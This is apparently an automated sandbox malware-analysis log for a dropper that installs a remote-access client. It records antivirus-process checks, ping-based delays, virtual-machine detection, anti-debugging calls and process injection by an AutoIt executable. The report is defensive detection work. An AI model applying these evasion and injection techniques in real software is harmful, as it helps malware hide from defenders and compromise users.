                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Uses ping.exe to sleep
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 8
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 8Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1924Thread sleep count: 7306 > 30
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5152Thread sleep time: -2767011611056431s >= -30000s
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4784Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1072Thread sleep count: 6756 > 30
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3492Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4708Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-34222
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\rrrr.exeWindow / User API: threadDelayed 452Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\rrrr.exeWindow / User API: threadDelayed 638Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exeWindow / User API: threadDelayed 508Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7306
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6756
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeAPI coverage: 7.5 %
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeAPI coverage: 6.1 %
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rrrr.exeJump to dropped file
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\AudioCapture.dllJump to dropped file
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeEvaded block: after key decisiongraph_1-29266
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeAPI call chain: ExitProcess graph end nodegraph_0-33932
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeAPI call chain: ExitProcess graph end nodegraph_1-30278
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeAPI call chain: ExitProcess graph end nodegraph_1-29160
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Temp\
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\AppData\
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifFile opened: C:\Users\user\
                                Source: client32.exe, 00000001.00000002.828711123.000000006CDC0000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: VMware
                                Source: client32.exe, 00000001.00000002.828711123.000000006CDC0000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: client32.exe, 00000001.00000003.326358193.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327217206.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.384862941.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327017392.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000002.827940603.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.325965285.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.326551349.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.328706032.000000000512A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: client32.exe, 00000001.00000002.828711123.000000006CDC0000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: client32.exe, 00000001.00000002.828711123.000000006CDC0000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: VMWare
                                Source: client32.exe, 00000001.00000002.827976809.0000000005151000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.326358193.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327217206.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.384862941.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327017392.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.325965285.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.385144367.0000000005132000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.326551349.0000000005129000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.328706032.000000000512A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000001.00000003.327309274.0000000005132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$+
                                Source: client32.exe, 00000002.00000003.349797370.0000000001050000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00977032 FindFirstFileExW,FindNextFileW,FindClose,0_2_00977032
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00976F7E _free,_free,FindFirstFileExW,0_2_00976F7E
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0042A89D LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__invoke_watson,GetProcAddress,GetProcAddress,__invoke_watson,0_2_0042A89D
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_009761BA mov eax, dword ptr fs:[00000030h]0_2_009761BA
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00971D01 mov eax, dword ptr fs:[00000030h]0_2_00971D01
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0041B3F9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B3F9
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_11148360 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,1_2_11148360
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00419B30 GetProcessHeap,HeapFree,0_2_00419B30
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0041F966 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041F966
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0041B3F9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B3F9
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0041AC13 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041AC13
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00424EE4 SetUnhandledExceptionFilter,0_2_00424EE4
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0097046A SetUnhandledExceptionFilter,0_2_0097046A
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00975939 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00975939
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00970476 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00970476
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_0096FDDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0096FDDC
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,1_2_11031780
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,1_2_110934A0
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_11162BB7
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_1116EC49

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Injects a PE file into a foreign processes
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifMemory written: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif base: 1000000 value starts with: 4D5A
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_11113190 GetKeyState,DeviceIoControl,keybd_event,1_2_11113190
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeProcess created: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe "C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeProcess created: C:\Users\user\AppData\Local\Temp\rrrr.exe "C:\Users\user\AppData\Local\Temp\rrrr.exe" Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell get-process avastui Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell get-process avgui Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^cruzVehicleRespectiveDiane$" Players Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif 4744\\Close.exe.pif 4744\\m Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 8Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: 0_2_00951840 wsprintfW,wsprintfW,wsprintfW,ShellExecuteW,GetSystemDirectoryW,RegOpenKeyW,lstrlenW,RegSetValueExW,RegCloseKey,0_2_00951840
                                Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exeCode function: 1_2_110EE230 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,1_2_110EE230
                                Source: rrrr.exe, 00000009.00000003.638565223.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.638487280.00000000029D4000.00000004.00001000.00020000.00000000.sdmp, rrrr.exe, 00000009.00000003.639138667.0000000002A49000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                                Source: client32.exe, 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: client32.exe, 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: Shell_TrayWnd
                                Source: client32.exe, client32.exe, 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: Progman
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,0_2_0041D069
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_0042703A
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_0042615B
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: GetLocaleInfoA,0_2_0042597B
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,0_2_00422101
                                Source: C:\Users\user\Desktop\0ud2VlMOvF.exeCode function: GetLocaleInfoA,GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,0_2_0042C1A9
